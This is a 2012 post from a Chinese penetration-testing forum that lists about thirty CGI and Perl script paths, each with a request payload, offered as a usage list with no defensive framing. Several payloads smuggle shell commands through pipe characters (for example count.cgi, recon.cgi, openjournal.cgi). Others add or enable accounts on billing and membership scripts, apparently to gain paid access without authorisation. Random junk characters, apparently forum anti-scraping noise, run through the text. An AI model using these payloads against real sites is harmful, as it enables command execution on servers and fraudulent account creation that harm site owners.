中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================
. w" K1 H" G0 }7 s8 T3 O% J) h  D9 Y9 I, p  G
/smspass.pl
* n0 ]8 @& P; R4 X! {& kusername=username&password=password) B* T" \) L8 O' r- M+ G

% Q7 G8 ~3 u0 {8 R/index.cgi
3 R. @8 p, H9 R9 X% j, awei=ren&gen=command6 I1 F9 T# P7 M% w% ]( _  w' v6 {

7 Q5 C+ M) e) N1 C% V$ N2 j/passmaster.cgi
2 ?; t6 ^  \) AAction=Add&Username=Username&Password=Password
7 e% K  A2 E* ^' J- t) \/ P' q
' F8 F  a2 _3 _! \/accountcreate.cgi
( u. h/ O. J0 O6 ]username=username&password=password&ref1=|echo;ls|
' i* F; v1 p7 `" ~8 x, \5 m0 U- I0 k3 F
/form.cgi
/ n% ]2 n7 V( R- g1 p( \name=xxxx&email=email&subject=xxxx&response=|echo;ls|0 m' w* Q/ y3 i2 I+ V9 Z) w( o  @

3 F* F( P* [; @+ ~0 I- s4 l. i/addusr.pl6 R. }/ [* g. ]
/cgi-bin/EuroDebit/addusr.pl# i, [! B8 |+ r1 P
user=username&pass=Password&confirm=Password* r6 M! O( `) r

( V( j# h6 C+ U# w; p  X; Z/ccbill-local.asp
% F  c0 t; u/ V: `. I" fpost_values=username:password5 j5 m6 x+ u1 o2 C  ]9 m

1 ]& _% D4 L4 e9 F0 S/count.cgi  j! L/ P. U7 l' Q5 S  R9 h
pinfile=|echo;ls -la;exit|  {9 T+ p8 j, I0 _4 T; p

; K  N) f) F! e9 _1 y: q0 B, b/recon.cgi
4 k2 q" J& y5 B% X5 L3 ?: p1 B. E/recon.cgi?search
5 a7 c" m! K% \3 lsearchoption=1&searchfor=|echo;ls -al;exit|
8 j2 |9 d* S$ Z1 \  a1 q, O* ]& l$ z9 ?2 Z9 j* M
/verotelrum.pl
! z' q, s( w% P8 H2 ]9 [: bvercode=username:password:dseegsow:add:amount<&30>
( a' Y4 b* u9 r  a( d
' k2 @8 ^) I' E+ k$ u/ B/af.cgi
7 N& N5 z; V/ X" o" ?. w6 x) V_browser_out=|echo;ls -la;exit;|
! s* v( `8 w7 d8 G% m6 C1 v% _6 N/ t+ p9 c' i( J) z, S$ X" d
/modify.cgi
" _, R! R. h5 l3 |9 cusername=username&password=password&expire=30# _+ z/ Y9 S* o, z' o

4 N$ s# `2 `* z7 j/openjournal.cgi
2 i1 j2 b9 s9 p$ h* ]9 pedit=1&ct=2&go=|echo;ls -al;exit|
5 M# t, _: }: S8 r, V9 ~3 J  q$ r, F' N" I
/gx9passwd.cgi
; v+ P# d! |6 S2 T/ rcmd=ADD&user=username&pass=password
  L& K% k, q# X; g- y
6 k$ Y+ l: B3 }& x/probecontrol.cgi
; I( W$ T% P8 W" @- I2 A# E; o' @command=enable&username=username&password=password, P- M  P. A4 z8 \5 V4 g- b, K
3 _. u& y  @0 h- _, V
/recon.cgi6 }2 [9 |/ i8 U5 C
searchoption=3&searchfor=echo;ls -la;exit& l) d- y$ c/ m* _7 I3 a* n$ b' I

6 l7 Y( V! g1 [- K/htadd.pl
+ x+ S- }$ E" k/ _' e& j  k7 @configfile=|echo; ls -alt; exit
6 _& A" H7 h- A% o  \/ X+ e8 c) {8 }* R% Q9 z
/gx9passwd.cgi1 N# i# N, A/ ]' g% [
cmd=ADD&user=username&pass=password
$ X* R( b# A8 t- g4 k
2 W- _5 _2 }! C7 T# P/ibill*.pl
4 o! e9 o  [6 k7 O" z# Xreqtype=add&authpwd=authpwd&username=username&password=password
2 T- X& S3 O2 ~2 r
. s( @! `$ a0 {" t5 j1 C/cpay.cgi
4 M; x" G5 I' _5 ?6 }- ?command=add_member&username=username(EMAIL)&password=password(DES)# o1 E6 H' o% \! a( R" F2 ]

+ M9 f! [$ U. ?% u2 @7 q, J6 f/globill_ut.cgi
2 V' C6 ?8 Y8 }/ c1 g0 hdo=add&username=username&password=password&wpassword=password8 T( N  g; c2 C
" ~( w  q& K5 s( L% D  P% m$ ]
/usercontrol.cgi
9 k1 ~1 O6 a6 I+ b! O# {command=enable&username=USER&password=PASS
& S6 |5 f' S8 z: Q1 {2 H: f
7 b4 \$ B3 O2 B1 l/globoSALErum.cgi% W! q) A  B8 G# G6 j, Y
action=ADD&seccode=seccode&login=username&password=password0 B$ R9 w' t$ s1 \  c# X) C6 @  y

: T# P( N- g% r$ ^/addusr.pl  g( j9 h" t6 h5 R
user=USER&pass=PASS&confirm=PASS
9 [* x6 I, y8 i8 u; h% d8 W8 e( S. t' K6 T8 D5 ^, D& L) ^
/pincount.cgi
# I4 P* u. @" p+ n/cgi-bin/mastergate/pincount.cgi: O4 ^  z" t6 O/ f! W7 Y+ o5 R
pinfile=|echo;pwd;exit|
# l; Z( z! P9 ]1 r* r' I0 |
4 z; F. ^$ p7 s5 x" d- J$ O+ v/accountcreate.cgi
& B& W0 V/ h; q  j- x+ S/cgi-bin/gateway/accountcreate.cgi0 l5 B) f, g4 \, c  g
username=username&password=password&password2=password&ref1=|echo;ls -al;exit  N' x( u0 Y. U! u' J% P8 E* O& y
: \; {  i, ?8 s/ A9 I' p/ l
/af.cgi, d$ e1 h+ N0 @! p+ `7 Y$ d
/env.cgi; F2 q$ b+ i$ E8 A2 Z- @  `" O0 V( F
ADD+;echo;pwd;exit' Q! s; \6 q! V$ L" V: U

, O; l: [. _; X3 w& _& A/count.cgi5 ?: T8 T8 d, g+ h+ n6 D
pinfile=|echo;pwd;exit|$ d! I$ X% y% {; Z( E6 o  y6 C7 a

3 G, j& u$ T, ?. v6 U% I- M; V, J/recon.cgi( E9 v+ S  O  s* s  g7 k
searchoption=1&searchfor=|echo;ls%20-al;exit|
2 {3 o3 y. {# ~, `! p- U
0 F0 H3 \+ V- l0 r/add.cgi
8 `7 O8 E( O! n0 }) s& h: `username=username&password=password&expire=30+ D8 c7 J  U& {. `' {8 P6 V8 C
% y, j( t' @% K, \0 E4 s: a, D+ x
==============================2 `. j! a, T5 A6 y0 P





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2